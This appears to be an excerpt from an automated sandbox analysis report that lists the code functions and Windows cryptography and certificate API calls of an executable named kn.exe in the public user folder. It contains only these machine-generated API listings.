      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0839480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0839480
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07BD5C2
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,6_2_00007FF7E07F55F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08195FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,6_2_00007FF7E08195FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,6_2_00007FF7E07FB55C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F570 CryptHashCertificate,SetLastError,6_2_00007FF7E085F570
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E0833590
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0869580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,6_2_00007FF7E0869580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E07E76B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,6_2_00007FF7E084D6A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08336E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E08336E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,6_2_00007FF7E081F6D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BF630 CryptAcquireContextW,GetLastError,#357,SetLastError,6_2_00007FF7E07BF630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F650 CryptHashCertificate2,SetLastError,6_2_00007FF7E085F650
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF7E0833654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E082F644
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF7E07BD660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,6_2_00007FF7E07A5664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,6_2_00007FF7E080366C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,6_2_00007FF7E081B664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0859688 CryptFindOIDInfo,#357,#360,#360,#360,6_2_00007FF7E0859688
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08337A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E08337A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D17D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,6_2_00007FF7E07D17D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08497E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,6_2_00007FF7E08497E4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,6_2_00007FF7E081B808
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,6_2_00007FF7E085F7FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF7E07CF810
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,6_2_00007FF7E085D750
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0835768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0835768
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,6_2_00007FF7E07FF774
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084B794 CryptExportPublicKeyInfoEx,SetLastError,6_2_00007FF7E084B794
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080577C #360,#358,CryptDecodeObject,GetLastError,#357,6_2_00007FF7E080577C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CD790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,6_2_00007FF7E07CD790
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07AB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,6_2_00007FF7E07AB788
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E08698B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B8D0 I_CryptGetLruEntryData,#357,6_2_00007FF7E081B8D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08018DC CertFindExtension,CryptDecodeObject,GetLastError,#357,6_2_00007FF7E08018DC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF7E07A38FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF7E082184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,6_2_00007FF7E081D850
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E0833860
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,6_2_00007FF7E07C7884
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0809878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,6_2_00007FF7E0809878
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,6_2_00007FF7E081B9CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF7E07BF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,6_2_00007FF7E086BA14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07B3918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,6_2_00007FF7E085F918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,6_2_00007FF7E083391C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EF944 CryptDecodeObject,GetLastError,#357,6_2_00007FF7E07EF944
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B950 I_CryptGetLruEntryData,#357,6_2_00007FF7E081B950
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0859970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF7E0859970
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E088B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,6_2_00007FF7E088B980
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF7E081597C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,6_2_00007FF7E07C7988
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895AA8 CryptDecodeObjectEx,6_2_00007FF7E0895AA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,6_2_00007FF7E07F3B14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0829AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF7E0829AF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07C3A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084BA50 CryptSignCertificate,SetLastError,6_2_00007FF7E084BA50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0831A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0831A44
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0837A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0837A70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0849A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,6_2_00007FF7E0849A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,6_2_00007FF7E085FA84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0795BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E0795BA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,6_2_00007FF7E07B9BC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF7E083BBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0833BEB
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,6_2_00007FF7E083FB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07FBB38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,6_2_00007FF7E086BB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0865B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,6_2_00007FF7E0865B44
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,6_2_00007FF7E0867B60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895B90 CryptDecodeObjectEx,memmove,6_2_00007FF7E0895B90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,6_2_00007FF7E07BBB80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,6_2_00007FF7E085FB94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0825CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,6_2_00007FF7E0825CE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF7E07CFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07EFC34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895C54 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF7E0895C54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,6_2_00007FF7E07D1C50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E07E3C60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0821C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,6_2_00007FF7E0821C84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF7E07C5DA1
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,6_2_00007FF7E07A1DE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,6_2_00007FF7E07C5DF7
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085FD2C CryptDecryptMessage,GetLastError,#357,6_2_00007FF7E085FD2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,6_2_00007FF7E084DD1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,6_2_00007FF7E0867D3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,6_2_00007FF7E086BD3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895D74 CryptDecodeObjectEx,strcmp,strcmp,6_2_00007FF7E0895D74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07F1D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0813D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,6_2_00007FF7E0813D60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07E9D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EDD80 CertFindExtension,CryptDecodeObject,6_2_00007FF7E07EDD80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0845D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,6_2_00007FF7E0845D80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EDEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF7E07EDEA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,6_2_00007FF7E081DEB0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,6_2_00007FF7E0867EE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,6_2_00007FF7E07E7F14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0825F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,6_2_00007FF7E0825F04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0821E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,6_2_00007FF7E0821E2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0895E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,6_2_00007FF7E0895E3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,6_2_00007FF7E085DE70
